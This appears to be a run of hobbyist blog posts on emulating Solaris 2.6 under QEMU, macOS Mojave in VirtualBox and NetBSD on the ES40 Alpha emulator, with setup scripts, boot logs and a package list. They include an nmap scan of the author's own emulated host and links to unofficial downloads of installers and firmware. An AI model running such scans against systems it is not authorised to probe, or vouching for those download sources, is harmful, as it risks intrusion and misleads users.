ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Next we replace the /etc/qemu-ifup  script with the below

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
ip link set "$1" up
else
brctl=$(which brctl)
if [ ! "$ip" -o ! "$brctl" ]; then
echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
exit 0
fi
ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
awk '/^default / {
for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
}'
)

switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
if [ -d /sys/class/net/$br/bridge/. ]; then
if [ -n "$ip" ]; then
ip link set "$1" master "$br"
else
brctl addif $br "$1"
fi
exit # exit with status of the previous command
fi
done

echo "W: $0: no bridge for guest interface found" >&2

So once we are ready we will launch the network.sh and move on to prepare the newly created disk.img to be ready for Solaris 2.6 installation. We will be running a simulated Sparc machine with 128 MB RAM and and disguise as SPARCstation5

You need to run this as root

# qemu-system-sparc -L . -m 128 -M SS-5 -bios ss5.bin -drive file=disk.img,bus=0,unit=0,media=disk -drive file=solaris-2.6-sparc.iso,bus=0,unit=6,media=cdrom -net nic -net tap -display vnc=:1

Next we must load the TightVNC viewer to connect to  the console ( 127.0.0.1:5901  or :1)

We add the boot cdrom:d -vs  (boot in single user mode from the ISO )

Next we need to load the disk labeling/formatting   by entering format in the root shell

Next we select 16 Other

We enter the 24620 as number of cylinders

Enter 27 as number of heads

Number of data sectors/track 107

Hit default values on the rest until you reach the disk name Qemu36GB

Next we get thrown to format prompt we finally run label on it

Once we see the below message about the corrupt label we run l

Now we are finally done, we can quit and reboot

So once we are in the SPARC boot prompt again we issue boot cdrom:d

Next the installer X11 screen should pop up

So we choose whatever suites us – this part is pretty straightforward

!!! Selet Manual Reboot option here since we need to make some changes to the system before we reboot it !!!

Finally the installation will start; it will take some time to finish so we can grab a cup of coffee

After the installer finishes we are left with a root shell in which we need to do a few things

We need to edit /a/etc/system and add to the end of it value as seen in the screenshot below  set scsi_options=0x58

Add default route to the network config file in /a/etc/defaultrouter    10.0.2.2

Add the following to /a/etc/nsswitch.conf   hosts:  file  dns      via vi

We define nameserver (google) in /a/etc/resolv.conf  nameserver 8.8.8.8

Finally we add the aliases to /a/etc/hosts

Now we are ready to reboot the installer so just type reboot in the root shell

Yet again we are back at the SPARC boot prompt, however  this time we boot the disk with Solaris

Next we define the root password

We will be given a choice to run either CDE or OpenDesktop environment next. I choose CDE  (I love the design, but hate the insecurity of it )

So by now we should have a fully working, networked Sun Solaris 2.6 environment. Reachable by 10.0.2.10 from the Linux Mint system (thanks to the br0 and tun0) and able to communicate with the internet via the HotJava browser (very limited nowadays)

And finally an Nmap scan of the default Sun Solaris 2.6 installation

# nmap -sS -sV -vv 10.0.2.10

Starting Nmap 7.70SVN ( https://nmap.org ) at 2018-09-21 22:45 CEST
NSE: Loaded 44 scripts for scanning.
Initiating ARP Ping Scan at 22:45
Scanning 10.0.2.10 [1 port]
Completed ARP Ping Scan at 22:45, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:45
Completed Parallel DNS resolution of 1 host. at 22:45, 0.02s elapsed
Initiating SYN Stealth Scan at 22:45
Scanning 10.0.2.10 [1000 ports]
Discovered open port 25/tcp on 10.0.2.10
Discovered open port 111/tcp on 10.0.2.10
Discovered open port 21/tcp on 10.0.2.10
Discovered open port 23/tcp on 10.0.2.10
Discovered open port 13/tcp on 10.0.2.10
Discovered open port 512/tcp on 10.0.2.10
Discovered open port 514/tcp on 10.0.2.10
Discovered open port 79/tcp on 10.0.2.10
Discovered open port 32775/tcp on 10.0.2.10
Discovered open port 32773/tcp on 10.0.2.10
Discovered open port 515/tcp on 10.0.2.10
Discovered open port 6000/tcp on 10.0.2.10
Discovered open port 32772/tcp on 10.0.2.10
Increasing send delay for 10.0.2.10 from 0 to 5 due to 144 out of 479 dropped probes since last increase.
Discovered open port 32777/tcp on 10.0.2.10
Discovered open port 6112/tcp on 10.0.2.10
Increasing send delay for 10.0.2.10 from 5 to 10 due to 30 out of 99 dropped probes since last increase.
Increasing send delay for 10.0.2.10 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Discovered open port 32774/tcp on 10.0.2.10
Increasing send delay for 10.0.2.10 from 20 to 40 due to 11 out of 33 dropped probes since last increase.
Discovered open port 4045/tcp on 10.0.2.10
Increasing send delay for 10.0.2.10 from 40 to 80 due to 11 out of 33 dropped probes since last increase.
Discovered open port 32771/tcp on 10.0.2.10
Discovered open port 9/tcp on 10.0.2.10
Discovered open port 1099/tcp on 10.0.2.10
Discovered open port 7100/tcp on 10.0.2.10
Discovered open port 19/tcp on 10.0.2.10
Discovered open port 37/tcp on 10.0.2.10
Discovered open port 32776/tcp on 10.0.2.10
Discovered open port 513/tcp on 10.0.2.10
Discovered open port 7/tcp on 10.0.2.10
Discovered open port 32779/tcp on 10.0.2.10
Discovered open port 32778/tcp on 10.0.2.10
Completed SYN Stealth Scan at 22:46, 57.78s elapsed (1000 total ports)
Initiating Service scan at 22:46
Scanning 28 services on 10.0.2.10
Completed Service scan at 22:49, 151.13s elapsed (28 services on 1 host)
NSE: Script scanning 10.0.2.10.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 22:49
Completed NSE at 22:49, 1.07s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 22:49
Completed NSE at 22:49, 1.07s elapsed
Nmap scan report for 10.0.2.10
Host is up, received arp-response (0.00031s latency).
Scanned at 2018-09-21 22:45:33 CEST for 211s
Not shown: 972 closed ports
Reason: 972 resets
PORT      STATE SERVICE          REASON          VERSION
7/tcp     open  echo             syn-ack ttl 255
9/tcp     open  discard?         syn-ack ttl 255
13/tcp    open  daytime          syn-ack ttl 255 Sun Solaris daytime
19/tcp    open  chargen          syn-ack ttl 255
21/tcp    open  ftp              syn-ack ttl 255 Sun SunOS ftpd 5.6
23/tcp    open  telnet           syn-ack ttl 255 Sun Solaris telnetd
25/tcp    open  smtp             syn-ack ttl 255 Sendmail SMI-8.6/SMI-SVR4
37/tcp    open  time             syn-ack ttl 255 (32 bits)
79/tcp    open  finger           syn-ack ttl 255 Sun Solaris fingerd
111/tcp   open  rpcbind          syn-ack ttl 255 2-4 (RPC #100000)
512/tcp   open  exec             syn-ack ttl 255
513/tcp   open  login            syn-ack ttl 255
514/tcp   open  tcpwrapped       syn-ack ttl 255
515/tcp   open  printer          syn-ack ttl 255 Sun Solaris lpd
1099/tcp  open  rmiregistry      syn-ack ttl 255 Java RMI
4045/tcp  open  nlockmgr         syn-ack ttl 255 1-4 (RPC #100021)
6000/tcp  open  X11              syn-ack ttl 255 (access denied)
6112/tcp  open  dtspc?           syn-ack ttl 255
7100/tcp  open  font-service     syn-ack ttl 255 Sun Solaris fs.auto
32771/tcp open  rpcbind          syn-ack ttl 255
32772/tcp open  kcms_server      syn-ack ttl 255 1 (RPC #100221)
32773/tcp open  cachefsd         syn-ack ttl 255 1 (RPC #100235)
32774/tcp open  status           syn-ack ttl 255 1 (RPC #100024)
32775/tcp open  ttdbserverd      syn-ack ttl 255 1 (RPC #100083)
32776/tcp open  sometimes-rpc15? syn-ack ttl 255
32777/tcp open  dmispd           syn-ack ttl 255 1 (RPC #300598)
32778/tcp open  snmpXdmid        syn-ack ttl 255 1 (RPC #100249)
32779/tcp open  ttsession        syn-ack ttl 255 1-4 (RPC #1342177279)
MAC Address: 52:54:00:12:34:56 (QEMU virtual NIC)
Service Info: Hosts: solaris, solaris.; OSs: Solaris, Unix; CPE: cpe:/o:sun:sunos, cpe:/o:sun:sunos:5.6

Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 211.79 seconds
           Raw packets sent: 1984 (87.280KB) | Rcvd: 1320 (52.932KB)

Solaris is pretty much dead now it seems … and I leave it as it is (its dead ass by the road …)

Acknowledgement :  I would like to thank the following authors for their valuable information as well as inspiration

Formatting disks for Solaris –  https://virtuallyfun.com/2010/10/03/formatting-disks-for-solaris/

Revisiting a Solaris on Qemu install – https://virtuallyfun.com/wordpress/2017/12/06/revisiting-a-solaris-on-qemu-install/  

Setting up TUN/TAP networking – https://tthtlc.wordpress.com/2015/10/21/qemu-how-to-setup-tuntap-bridge-networking/

Short entry here, since it was covered in the early article how to setup the Mojave-Beta in VirtualBox and Apple released the stable Mojave yesterday.  Maybe somebody will find it useful.

We will download the Mojave dmg via AppleStore from the Mojave-Beta VBox guest that we installed earlier  ( you can download the ready made ISO from here https://drop.me/oj2GJl )

Without actually installing it, after download is finished we run the following sets of commands to create the Mojave.iso

hdiutil create -o /tmp/Mojave.cdr -size 6000m -layout SPUD -fs HFS+J
attach /tmp/Mojave.cdr.dmg -noverify -mountpoint /Volumes/install_build
sudo /Applications/Install\ macOS\ Mojave.app/Contents/Resources/createinstallmedia --volume /Volumes/install_build
mv /tmp/Mojave.cdr.dmg ~/Desktop/
hdiutil detach /Volumes/Install\ macOS\ Mojave/
hdiutil convert ~/Desktop/Mojave.cdr.dmg -format UDTO -o ~/Desktop/Mojave.iso

Next we upload the Mojave.iso to our Linux host and continue with the standard macOS VirtualBox setup  (In the first stage attach Mojave.iso – clover.iso will be in the second one)

You can download the macOS Mojave from here https://drop.me/oj2GJl

Before we run the VM make sure you execute the following script to setup VirtualBox for macOS – replace the NAME variable with the name of the VirtualBox guest name.

#!/bin/bash
readonly VM_RES="1680x1050"
readonly NAME="Mojave"

VBoxManage modifyvm "$NAME" --usbxhci on --firmware efi --chipset ich9 --mouse usbtablet --keyboard usb
VBoxManage setextradata "$NAME" "CustomVideoMode1" "${VM_RES}x32"
VBoxManage setextradata "$NAME" VBoxInternal2/EfiGraphicsResolution "$VM_RES"
VBoxManage modifyvm "$NAME" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

Also the following networking script is used (adjust accordingly) for the following network config in VirtualBox

If you don’t care about virtual VLANs you can just use the default NAT and choose DHCP in macOS install

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25 vboxnet0 
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Next we go on with the normal Mojave.iso boot

Once we get to the first setup screen “erase” disk with APFS and start the installation – don’t worry that VirtualBox does not understand APFS partitions in UEFI, we have the custom Clover.iso loader for that during 2nd stage install.

Once the 1st stage installer finishes, it will reboot and you will endup yet again in the same setup window, since we did not switch the ISO, so just terminate the macOS guest and swap the Mojave.iso with Clover.iso

you can download Clover.iso with APFS support here https://drop.me/MRqW76

Boot again the guest VM and in Clover menu choose the Boot macOS Install from Mojave (Name of the disk I have chosen during 1st stage setup)  (move the arrow keys to navigate Clover menu)

Next we continue with the standard setup

After it finishes, it will reboot but will get stuck in the following screen, so just hard reset here no problem

Boot again with the Clover.iso still attached (we will use Clover to load macOS) and choose Boot macOS from Mojave (use the arrow keys to navigate Clover menu)

Next we configure network (adjust accordingly)

And welcome to your new macOS 10.14 Mojave !

ES40 is the only open source emulator for the HP (DEC, Compaq) AlphaServer ES40. The current version is capable of running OpenVMS with some limitations. It emulates the Alpha AXP EV68CB processor and other devices.  ES40 emulator development has virtually been halted since 2009. The following will be about the

ES40 Version 0.18+

So sorry kids, no under 18s here

The homepage of the ES40 project is still up here http://es40.org/Homepage and it is pretty straight forward to follow their build instructions, which Im gonna cover briefly here  ….

I could not run NetBSD/OpenBSD via Alphavm_free and I have covered it here https://astr0baby.wordpress.com/2017/05/30/alphavm_free-and-bsds/

So only choice now is really hardcore hacking via qemu-system-alpha or the ancient ES40. So will ES40 work with recent NetBSD 8 ? Assuming you have your environment setup for building stuff I will only cover the fundamental dependencies for the ES40 build

• Poco C++ libraries
• Libpcap-devel
• libX11-devel
• SDL-devel

# apt-get install libpcap-dev build-essential unzip libx11-dev libsdl-dev automake autotools-dev libpoco-dev libxt-dev checkinstall

So lets build this now

# This will pull latest sources and clone it to es40 directory 
cvs -d:pserver:anonymous@es40.cvs.sourceforge.net:/cvsroot/es40 login     (hit enter) 
cvs -z3 -d:pserver:anonymous@es40.cvs.sourceforge.net:/cvsroot/es40 checkout -P es40

$ cd es40 
$ chmod +x configure 
$ chmod +x configure_1.sh
$ chmod +x configure_2.sh
$ cp config/config.guess  .
$ ./configure
This is the debug-options configuration script for the ES40 emulator
If you don't want any debugging options enabled, answer YES to the
following question
Do you want the defaults for all options? (yes, no) [yes]: yes   (we don't want debug now) 
......
$ make 
......
$ cd src 
$ ls -la es40     <-- this will be our main emulator binary) 
-rwxr-xr-x 1 user user 5241664 Oct 11 21:56 es40

Next we prepare the working directory where we will hold the images,ISOs, ROM files as well as the es40 binary. We will need a couple of files so lets describe them and download them

cl67srmrom.exe  is the SRM firmware (also called the SRM console) is the boot firmware written by DEC for systems based on the Alpha AXP microprocessor.   downloadable here https://drop.me/MRq778

netbsd8.iso is our NetBSD Alpha ISO downloadable from here http://ftp.netbsd.org/pub/NetBSD/iso/8.0/NetBSD-8.0-alpha.iso

So we place these 2 files into the working directory where we will hold our simulation

$ mkdir ~/RUN 
$ cd ~/RUN 
$ cp ~/es40/src/es40 . 
$ wget http://ftp.netbsd.org/pub/NetBSD/iso/8.0/NetBSD-8.0-alpha.iso

Download the https://drop.me/MRq778 and place the cl67srmrom.exe here 
So you should have these files present 
$ ls -la 
total 387732
drwxr-xr-x 2 user user      4096 Oct 11 22:20 .
drwxr-xr-x 4 user user      4096 Oct 11 22:10 ..
-rw-r--r-- 1 user user    693248 Oct 11 22:20 cl67srmrom.exe
-rwxr-xr-x 1 user user   5241664 Oct 11 22:10 es40
-rw-r--r-- 1 user user 391090176 Oct 11 22:20 netbsd8.isof

Lest configure the es40 configuration file now (this holds all the needed info for the emulator)  and save this file as /etc/es40.cfg

{
keyboard.use_mapping = false;
keyboard.map = "keys.map";
}

sys0 = tsunami 
{
rom.srm = "cl67srmrom.exe";
rom.decompressed = "decompressed.rom";
rom.flash = "flash.rom";
rom.dpr = "dpr.rom";
memory.bits = 29;

cpu0 = ev68cb { icache = false; speed = 800M; }
pci0.7 = ali{
mouse.enabled = false;
lpt.outfile = "lpt.out";
}

pci0.3 = sym53c810
{ 
disk0.0 = file { 
file = "disk0-es40.img";
read_only = false;
cdrom = false;
autocreate_size = 6000M;
}
disk0.4 = file {
file = "netbsd8.iso";
read_only = true;
cdrom = true;
}
disk0.5 = ramdisk 
{ size = 10M; } 
}

pci0.4 = dec21143 
{ adapter = "tap0" mac = "08-00-2B-E5-40-00"; }

serial0 = serial 
{ port = 21264; }

}

Next we will boot the simulator (we will need root privileges since we touch the tap0 interface)

$ cd ~/RUN 
$ su 
# ./es40

Following should be visible after the disk gets created

Next we telnet to localhost port 21264

$ telnet localhost 21264

After a while (testing memory procedure …) you will get the following SRM prompt

We run the sho dev to list all the devices visible to the Alpha Console and since we are installing we will boot DKA400 (ISO CDROM with NetBSD8)

P00>>> boot DKA400

And the boot process gets stuck on the mcclock() and move no further … so what now ? Well lets first stop the emulator. I could not stop if normally so I have just issues a kill command …

root@panasonic:/home/user# ps -ef | grep es40
root 32409 32366 74 22:29 pts/3 00:05:11 ./es40
root@panasonic:/home/user# kill -9 32409
root@panasonic:/home/user#

Luckily Dimitry Kalinkin modified the above sources so that NetBSD could boot and his fork of ES40 can be downloaded from here  https://github.com/veprbl/es40

So lets build this one and see how it goes

Lets move the old ES40 sources away 
$ mv ~/es40 ~/es40.old 
$ git clone  https://github.com/veprbl/es40
$ cd es40 
$ cp config/config.guess  .
$ ./configure
This is the debug-options configuration script for the ES40 emulator
If you don't want any debugging options enabled, answer YES to the
following question
Do you want the defaults for all options? (yes, no) [yes]: yes
$ make 
...... 
$ 

So once we have the new es40 binary built we copy it over the old one and re-run the emulator

$ cd ~/RUN 
$ cp ~/es40/src/es40 .     <-- the new es40 binary 
$ su 
# ./es40

This time we should be in much better shape (memory checks are gone, and the whole Console startup is much faster … )

And whats important NetBSD 8 installation ISO loads and actually installs – so after we run

P00>>> boot DKA400

Finally NetBSD/alpha 8.0 installer comes up

Installation then is pretty standard and I will not cover this here, however there are a few issues after the installation finishes (full-sets ..do not set network yet in the installer) . We poweroff NetBSD installer and in the SRM console we choose the dka0 disk to boot from

P00>>> set boot_osflags a             (thx herdware) 
P00>>> boot DKA0

Now we will need to wait a while for the initial scripts to finish .. take some time so be patient

<-- cut -->
Loaded entropy from /var/db/entropy-file.
Setting tty flags.
Setting sysctl variables:
ddb.onpanic: 1 -> 0
Starting network.
/etc/rc: WARNING: $hostname not set.
IPv6 mode: host
Configuring network interfaces:.
Adding interface aliases:.
Waiting for DAD to complete for statically configured addresses...
Building databases: dev, services.
Starting syslogd.
Mounting all file systems...
Clearing temporary files.
Updating fontconfig cache:

What I cannot get to run is the networking .. emulated NetBSD can see the network device

# ifconfig -a
tlp0: flags=0x8802<BROADCAST,SIMPLEX,MULTICAST> mtu 1500
ec_capabilities=1<VLAN_MTU>
ec_enabled=0
address: 08:00:2b:e5:40:00
media: Ethernet autoselect (autoselect)
lo0: flags=0x8048<LOOPBACK,RUNNING,MULTICAST> mtu 33112

But when I bring it up like this

# ifconfig tlp0 10.0.2.222 255.255.255.0 up 
# ifconfig -a
tlp0: flags=0x8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
ec_capabilities=1<VLAN_MTU>
ec_enabled=0
address: 08:00:2b:e5:40:00
media: Ethernet autoselect (100baseTX)
status: active
inet 10.0.2.222/8 broadcast 10.255.255.255 flags 0x0
inet6 fe80::a00:2bff:fee5:4000%tlp0/64 flags 0x0 scopeid 0x1
lo0: flags=0x8048<LOOPBACK,RUNNING,MULTICAST> mtu 33112

# route add default 10.0.2.2
# route show
Routing tables

Internet:
Destination Gateway Flags Refs Use Mtu Interface

default 10.0.2.2 UG - - - tlp0
10.0.2/24 link#1 U - - - tlp0
10.0.2.222 link#1 UHl - - - lo0

Internet6:
Destination Gateway Flags Refs Use Mtu Interface
fe80::%tlp0/64 link#1 U - - - tlp0
fe80::a00:2bff:fee link#1 UHl - - - lo0
ff01:1::/32 link#1 U - - - tlp0
ff02::%tlp0/32 link#1 U - - - tlp0

I get the following console messages flooding
 
tlp0: filter setup and transmit timeout
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: filter setup and transmit timeout
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: filter setup and transmit timeout
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: receive process failed to idle: state RUNNING - WAIT

The network does not work with my bridged tap0 device ..

Full dmesg below

Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
    2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017,
    2018 The NetBSD Foundation, Inc.  All rights reserved.
Copyright (c) 1982, 1986, 1989, 1991, 1993
    The Regents of the University of California.  All rights reserved.

NetBSD 8.0 (GENERIC) #0: Tue Jul 17 14:59:51 UTC 2018
        mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/alpha/compile/GENERIC
AlphaServer ES40, 800MHz, s/n 
8192 byte page size, 1 processor.
total memory = 512 MB
(2736 KB reserved for PROM, 509 MB used by NetBSD)
avail memory = 489 MB
timecounter: Timecounters tick every 0.976 msec
Kernelized RAIDframe activated
running cgd selftest aes-xts-256 aes-xts-512 done
mainbus0 (root)
cpu0 at mainbus0: ID 0 (primary), 21264C-6
cpu0: Architecture extensions: 0x1305<PAT,MVI,CIX,BWX>
tsc0 at mainbus0: 21272 Core Logic Chipset, Cchip rev 0
tsc0: 8 Dchips, 2 memory buses of 16 bytes
tsc0: arrays present: 512MB, 0MB, 0MB, 0MB, Dchip 0 rev 1
tsp0 at tsc0
pci0 at tsp0 bus 0
pci0: i/o space, memory space enabled, rd/line, rd/mult, wr/inv ok
siop0 at pci0 dev 3 function 0: Symbios Logic 53c810 (fast scsi)
siop0: interrupting at dec 6600 irq 16
scsibus0 at siop0: 8 targets, 8 luns per target
tlp0 at pci0 dev 4 function 0: DECchip 21143 Ethernet, pass 3.0
tlp0: interrupting at dec 6600 irq 20
tlp0: DEC, Ethernet address 08:00:2b:e5:40:00
tlp0: 100baseTX, 10baseT, auto
sio0 at pci0 dev 7 function 0: vendor 10b9 product 1533 (rev. 0xc3)
isa0 at sio0
lpt0 at isa0 port 0x3bc-0x3bf irq 7
com0 at isa0 port 0x3f8-0x3ff irq 4: ns8250 or ns16450, no fifo
com0: console
pckbc0 at isa0 port 0x60-0x64
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0 mux 1
pms0 at pckbc0 (aux slot)
pckbc0: using irq 12 for aux slot
wsmouse0 at pms0 mux 0
attimer0 at isa0 port 0x40-0x43
pcppi0 at isa0 port 0x61
spkr0 at pcppi0: PC Speaker
midi0 at pcppi0: PC speaker
isabeep0 at pcppi0
mcclock0 at isa0 port 0x70-0x71: mc146818 compatible time-of-day clock
attimer0: attached to pcppi0
tsp1 at tsc0
pci1 at tsp1 bus 0
pci1: i/o space, memory space enabled, rd/line, rd/mult, wr/inv ok
tsciic0 at tsc0
iic0 at tsciic0: I2C bus
timecounter: Timecounter "clockinterrupt" frequency 1024 Hz quality 0
timecounter: Timecounter "PCC" frequency 792674656 Hz quality 1000
scsibus0: waiting 2 seconds for devices to settle...
sd0 at scsibus0 target 0 lun 0: <DEC, RZ58     (C) DEC, 2000> disk fixed
sd0: 6000 MB, 15360 cyl, 16 head, 50 sec, 512 bytes/sect x 12288000 sectors
sd0: async, 8-bit transfers
cd0 at scsibus0 target 4 lun 0: <DEC, RRD42   (C) DEC, 4.5d> cdrom removable
cd0: async, 8-bit transfers
sd1 at scsibus0 target 5 lun 0: <DEC, RZ58     (C) DEC, 2000> disk fixed
sd1: 10240 KB, 32 cyl, 16 head, 40 sec, 512 bytes/sect x 20480 sectors
sd1: async, 8-bit transfers
root on sd0a dumps on sd0b
kern.module.path=/stand/alpha/8.0/modules
/dev/sd0a: file system not clean (fs_clean=0x40); please fsck(8)
/dev/sd0a: lost blocks 0 files 0

Video here :

Acknowledgements :

https://raymii.org/s/blog/Installing_the_es40_AlphaServer_emulator_0.18_on_Ubuntu_16.04_and_trying_to_install_openVMS_8.4_on_es40.html

https://github.com/veprbl/es40

http://es40.org/Homepage

A while ago I have seen a nice parody short comic strip from Middle-Earth, when Gandalf visited Biblo Baggins few years later after his adventures in the Lonely Mountain. Bilbo has of course brought with him the “one ” ring of power which tends to corrupt even the strongest characters of mortal men or hobbits.

How surprised was Gandalf to find out Bilbo started a new “burglary” business operation in his Bag-End along with the fellow surviving dwarfs (Nori, Dori and Bombur)

The above comic was made by Alexandr Remizov and the original Russian version is here

https://www.mirf.ru/fun/funny/komiks-vzlomschik-iz-shira

Today is the All Soul’s Day and people usually spend some time remembering the dead. I will take the opportunity and remember the dead computer architecture Alpha (made by Digital which was the top computer hardware in the 90s and early 2000’s)

Year passes and I wanted to update the existing Gentoo installation that I have made in the past that ran on the Alphavm-free. This time it took me  4 weeks to chew through the kernel configuration,  couple of unsuccessful kernel builds and during all this time my Panasonic Toughbook CF-53 ran almost nonstop on 100% CPU (Amazing hardware btw)

I will not cover how to setup Gentoo on simulated Alpha EV67 Tsunami  as it was partially described in the last years blog entry. I wanted to keep this post short and to the point. This time its again a little show-off “Circus” style what was done on the simulation.

Here are the details of the simulated system (Im running all this on Linux Mint 19 x86_64) The Alphavm-free guest has 1 CPU and 1 GB RAM assigned

# cat /proc/cpuinfo 
cpu			: Alpha
cpu model		: EV67
cpu variation		: 7
cpu revision		: 0
cpu serial number	: AlphaVM-CPU-00
system type		: Tsunami
system variation	: Catamaran
system revision		: 0
system serial number	: EmuVM-00-000-001"
cycle frequency [Hz]	: 833333333 
timer frequency [Hz]	: 1000.00
page size [bytes]	: 8192
phys. address bits	: 44
max. addr. space #	: 255
BogoMIPS		: 814.28
kernel unaligned acc	: 0 (pc=0,va=0)
user unaligned acc	: 143076 (pc=20000180500,va=1200741a9)
platform string		: AlphaServer DS20E 833 MHz
cpus detected		: 1
cpus active		: 1
cpu active mask		: 0000000000000001
L1 Icache		: 64K, 2-way, 64b line
L1 Dcache		: 64K, 2-way, 64b line
L2 cache		: n/a
L3 cache		: n/a

Following packages are installed on the Gentoo Alpha as of today (2nd November)

app-admin/eselect-1.4.13
app-admin/perl-cleaner-2.25
app-arch/bzip2-1.0.6-r10
app-arch/cpio-2.12-r1
app-arch/gzip-1.8
app-arch/libarchive-3.3.1
app-arch/tar-1.30
app-arch/unzip-6.0_p21-r2
app-arch/xz-utils-5.2.3
app-crypt/rhash-1.3.6-r1
app-editors/nano-2.8.7
app-editors/vim-8.0.1298
app-editors/vim-core-8.0.1298
app-eselect/eselect-ctags-1.18
app-eselect/eselect-fontconfig-1.0
app-eselect/eselect-lib-bin-symlink-0.1.1
app-eselect/eselect-opengl-1.3.1-r4
app-eselect/eselect-pinentry-0.7
app-eselect/eselect-postgresql-2.3
app-eselect/eselect-python-20171204
app-eselect/eselect-ruby-20170723
app-eselect/eselect-vi-1.1.9
app-misc/ca-certificates-20170717.3.36.1
app-misc/c_rehash-1.7-r1
app-misc/editor-wrapper-4
app-misc/mime-types-9
app-misc/pax-utils-1.2.3
app-portage/elt-patches-20170815
app-portage/portage-utils-0.64
app-shells/bash-4.4_p12
app-text/build-docbook-catalog-1.21
app-text/docbook-xml-dtd-4.1.2-r6
app-text/docbook-xsl-stylesheets-1.79.1-r2
app-text/manpager-1
app-text/openjade-1.3.2-r7
app-text/opensp-1.5.2-r3
app-text/po4a-0.47-r1
app-text/sgml-common-0.6.3-r6
app-vim/gentoo-syntax-20180821
dev-db/postgresql-10.5
dev-db/sqlite-3.24.0
dev-lang/perl-5.24.3-r1
dev-lang/python-2.7.14-r1
dev-lang/python-3.5.4-r1
dev-lang/python-3.6.5
dev-lang/python-exec-2.4.6
dev-lang/ruby-2.3.7
dev-libs/elfutils-0.170-r1
dev-libs/expat-2.2.5
dev-libs/glib-2.52.3
dev-libs/gmp-6.1.2
dev-libs/iniparser-3.1-r1
dev-libs/libassuan-2.5.1
dev-libs/libbsd-0.9.1
dev-libs/libevdev-1.5.9-r1
dev-libs/libffi-3.2.1
dev-libs/libgcrypt-1.8.3
dev-libs/libgpg-error-1.29
dev-libs/libinput-1.10.7
dev-libs/libksba-1.3.5-r1
dev-libs/libltdl-2.4.6
dev-libs/libpcre-8.41-r1
dev-libs/libpipeline-1.4.2
dev-libs/libpthread-stubs-0.4-r1
dev-libs/libtasn1-4.13
dev-libs/libunistring-0.9.7
dev-libs/libxml2-2.9.7
dev-libs/libxslt-1.1.30-r2
dev-libs/libyaml-0.1.7
dev-libs/mpc-1.0.3
dev-libs/mpfr-3.1.6
dev-libs/nettle-3.4
dev-libs/npth-1.3
dev-libs/openssl-1.0.2p
dev-libs/popt-1.16-r2
dev-perl/Authen-SASL-2.160.0-r1
dev-perl/Digest-HMAC-1.30.0-r1
dev-perl/Error-0.170.250
dev-perl/IO-Socket-SSL-2.52.0
dev-perl/libintl-perl-1.280.0
dev-perl/Locale-gettext-1.70.0
dev-perl/MailTools-2.190.0
dev-perl/Module-Build-0.422.400
dev-perl/Net-SMTP-SSL-1.40.0
dev-perl/Net-SSLeay-1.820.0
dev-perl/SGMLSpm-1.1-r1
dev-perl/TermReadKey-2.370.0
dev-perl/Text-CharWidth-0.40.0-r1
dev-perl/Text-Unidecode-1.300.0
dev-perl/Text-WrapI18N-0.60.0-r1
dev-perl/TimeDate-2.300.0
dev-perl/Unicode-EastAsianWidth-1.330.0-r1
dev-perl/XML-Parser-2.440.0
dev-python/certifi-2018.4.16
dev-python/docutils-0.13.1
dev-python/pyblake2-1.1.0
dev-python/pygments-2.2.0
dev-python/pyxattr-0.5.5
dev-python/setuptools-36.7.2
dev-ruby/did_you_mean-1.0.2
dev-ruby/json-1.8.6-r1
dev-ruby/minitest-5.10.3
dev-ruby/net-telnet-0.1.1-r1
dev-ruby/power_assert-1.1.1
dev-ruby/racc-1.4.14
dev-ruby/rake-10.5.0
dev-ruby/rdoc-4.3.0
dev-ruby/rubygems-2.7.6-r1
dev-ruby/test-unit-3.2.7
dev-util/cmake-3.9.6
dev-util/ctags-20161028
